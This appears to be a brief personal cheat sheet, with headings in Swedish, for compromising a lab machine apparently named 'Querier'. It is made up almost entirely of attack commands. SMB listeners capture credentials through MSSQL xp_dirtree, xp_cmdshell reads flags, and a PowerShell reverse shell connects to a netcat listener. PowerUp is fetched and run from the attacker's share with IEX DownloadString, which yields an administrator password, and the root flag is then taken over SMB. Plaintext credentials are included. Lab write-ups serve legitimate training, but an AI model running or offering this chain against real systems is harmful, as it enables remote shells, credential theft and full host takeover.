LISTENER: python smbserver.py -smb2support -ip reporting /tmp

RUN: (för mssql query som ger user/pw) python mssqlclient.py -windows-auth querier/reporting:PcwTWTHRwryjc$c6@ SQL> EXEC master.sys.xp_dirtree ‘\\tmp’

ANSLUT MED RÄTT CREDS: python mssqlclient.py querier/mssql-svc:corporate568@ -windows-auth

xp_cmdshell type C:\Users\mssql-svc\Desktop\user.txt



Starta smbserver samt netcat för PowerShellTCP:

python smbserver.py -smb2support -ip querier /tmp

nc -lnvp 4444

ANSLUT SOM MSSQL-SVC: SQL > xp_cmdshell move \\querier\Invoke-PowerShellTcp.ps1 C:\Users\mssql-svc\Desktop\pENIS.ps1 SQL > xp_cmdshell “powershell -file c:\Users\mssql-svc\Desktop\pENIS.ps1 -Reverse -IPAddress -Port 4444”

PS > IEX (New-Object Net.WebClient).DownloadString(‘\\querier\PowerUp.ps1’); Invoke-AllChecks [*] Checking for cached Group Policy Preferences .xml files…. Usernames : {Administrator} Passwords : {MyUnclesAreMarioAndLuigi!!1!}

Plocka root:

python smbclient.py querier/Administrator:MyUnclesAreMarioAndLuigi!!1!@

use C$

cd Users/Administrator/Desktop

get root.txt